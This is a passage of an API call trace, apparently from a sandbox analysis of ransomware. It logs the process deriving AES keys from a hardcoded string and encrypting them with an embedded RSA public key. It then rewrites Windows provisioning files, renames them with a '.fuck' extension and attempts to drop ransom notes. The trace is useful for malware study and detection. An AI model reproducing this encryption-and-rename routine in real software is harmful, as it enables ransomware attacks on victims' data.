Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283ad78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283ad80*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x28177d8) returned 1 [0237.036] CryptEncrypt (in: hKey=0x28177d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.036] CryptEncrypt (in: hKey=0x28177d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2832ae8*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2832ae8*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.036] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2832ae8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.036] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.036] CryptEncrypt (in: hKey=0x2817a18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.036] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.036] CloseHandle (hObject=0xffffffff) returned 1 [0237.036] CloseHandle (hObject=0xffffffff) returned 1 [0237.036] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.037] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0237.037] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml.gsg")) returned 0 [0237.037] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_0.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_0.provxml.fuck")) returned 0 [0237.038] CryptDestroyHash (hHash=0x2817798) returned 1 [0237.038] CryptDestroyKey (hKey=0x2817a18) returned 1 [0237.038] CryptReleaseContext (hProv=0x2833368, dwFlags=0x0) returned 1 [0237.038] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.038] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.038] GetLastError () returned 0x5 [0237.038] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml")) returned 0x20 [0237.038] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x80) returned 0 [0237.039] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.039] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.039] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.039] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x28330c0) returned 1 [0237.045] CryptCreateHash (in: hProv=0x28330c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.046] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.046] CryptHashData (hHash=0x2817758, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.046] CryptDeriveKey (in: hProv=0x28330c0, Algid=0x6610, hBaseData=0x2817758, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28178d8) returned 1 [0237.046] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.046] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.046] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2833368) returned 1 [0237.047] CryptImportPublicKeyInfo (in: hCryptProv=0x2833368, dwCertEncodingType=0x1, pInfo=0x283a5f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283a628*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283a630*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2817798) returned 1 [0237.047] CryptEncrypt (in: hKey=0x2817798, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.047] CryptEncrypt (in: hKey=0x2817798, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2832b70*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2832b70*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.047] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2832b70, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.048] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.048] CryptEncrypt (in: hKey=0x28178d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.048] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.048] CloseHandle (hObject=0xffffffff) returned 1 [0237.048] CloseHandle (hObject=0xffffffff) returned 1 [0237.048] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml"), bFailIfExists=0) returned 0 [0237.048] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml", dwFileAttributes=0x0) returned 0 [0237.049] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml.gsg")) returned 0 [0237.049] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\Power_1.provxml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\power_1.provxml.fuck")) returned 0 [0237.049] CryptDestroyHash (hHash=0x2817758) returned 1 [0237.049] CryptDestroyKey (hKey=0x28178d8) returned 1 [0237.049] CryptReleaseContext (hProv=0x28330c0, dwFlags=0x0) returned 1 [0237.049] FindNextFileA (in: hFindFile=0x2817458, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0 [0237.049] FindClose (in: hFindFile=0x2817458 | out: hFindFile=0x2817458) returned 1 [0237.049] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\readme_back_files.htm")) returned 0xffffffff [0237.050] AreFileApisANSI () returned 1 [0237.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2832c80, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 113 [0237.050] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e810, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.050] GetLastError () returned 0x5 [0237.050] GetLastError () returned 0x5 [0237.050] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.050] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0237.050] GetLastError () returned 0x5 [0237.050] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml")) returned 0x20 [0237.051] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml", dwFileAttributes=0x80) returned 0 [0237.051] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.051] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.051] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.052] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2832c80) returned 1 [0237.056] CryptCreateHash (in: hProv=0x2832c80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0237.056] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.057] CryptHashData (hHash=0x2817458, pbData=0x2ec878, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.057] CryptDeriveKey (in: hProv=0x2832c80, Algid=0x6610, hBaseData=0x2817458, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817c18) returned 1 [0237.057] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.057] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0237.057] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2832d08) returned 1 [0237.058] CryptImportPublicKeyInfo (in: hCryptProv=0x2832d08, dwCertEncodingType=0x1, pInfo=0x283b978*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x283b9a8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x283b9b0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817958) returned 1 [0237.059] CryptEncrypt (in: hKey=0x2817958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0237.059] CryptEncrypt (in: hKey=0x2817958, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2832598*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2832598*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0237.059] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2832598, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.059] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0237.059] CryptEncrypt (in: hKey=0x2817c18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0237.059] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0237.059] CloseHandle (hObject=0xffffffff) returned 1 [0237.059] CloseHandle (hObject=0xffffffff) returned 1 [0237.059] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml"), bFailIfExists=0) returned 0 [0237.060] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml", dwFileAttributes=0x0) returned 0 [0237.060] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml.gsg")) returned 0 [0237.060] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\runtime.xml.fuck")) returned 0 [0237.060] CryptDestroyHash (hHash=0x2817458) returned 1 [0237.061] CryptDestroyKey (hKey=0x2817c18) returned 1 [0237.061] CryptReleaseContext (hProv=0x2832c80, dwFlags=0x0) returned 1 [0237.061] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.061] FindClose (in: hFindFile=0x2817098 | out: hFindFile=0x2817098) returned 1 [0237.061] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.061] AreFileApisANSI () returned 1 [0237.061] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.061] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.061] GetLastError () returned 0x5 [0237.061] GetLastError () returned 0x5 [0237.061] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.061] FindClose (in: hFindFile=0x2817298 | out: hFindFile=0x2817298) returned 1 [0237.062] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\readme_back_files.htm")) returned 0xffffffff [0237.062] AreFileApisANSI () returned 1 [0237.062] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2d78, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.062] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{18dcffd4-37d6-4bc6-87e0-4266fdbb8e49}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.062] GetLastError () returned 0x5 [0237.062] GetLastError () returned 0x5 [0237.062] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.062] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2817098 [0237.062] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.063] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.063] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.063] GetLastError () returned 0x5 [0237.063] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml")) returned 0x20 [0237.072] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.072] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.073] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.073] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{1e05dd5d-a022-46c5-963c-b20de341170f}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.073] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2832c80) returned 1 [0237.078] CryptCreateHash (in: hProv=0x2832c80, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.078] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.078] CryptHashData (hHash=0x2817458, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.078] CryptDeriveKey (in: hProv=0x2832c80, Algid=0x6610, hBaseData=0x2817458, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x28179d8) returned 1 [0237.078] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC 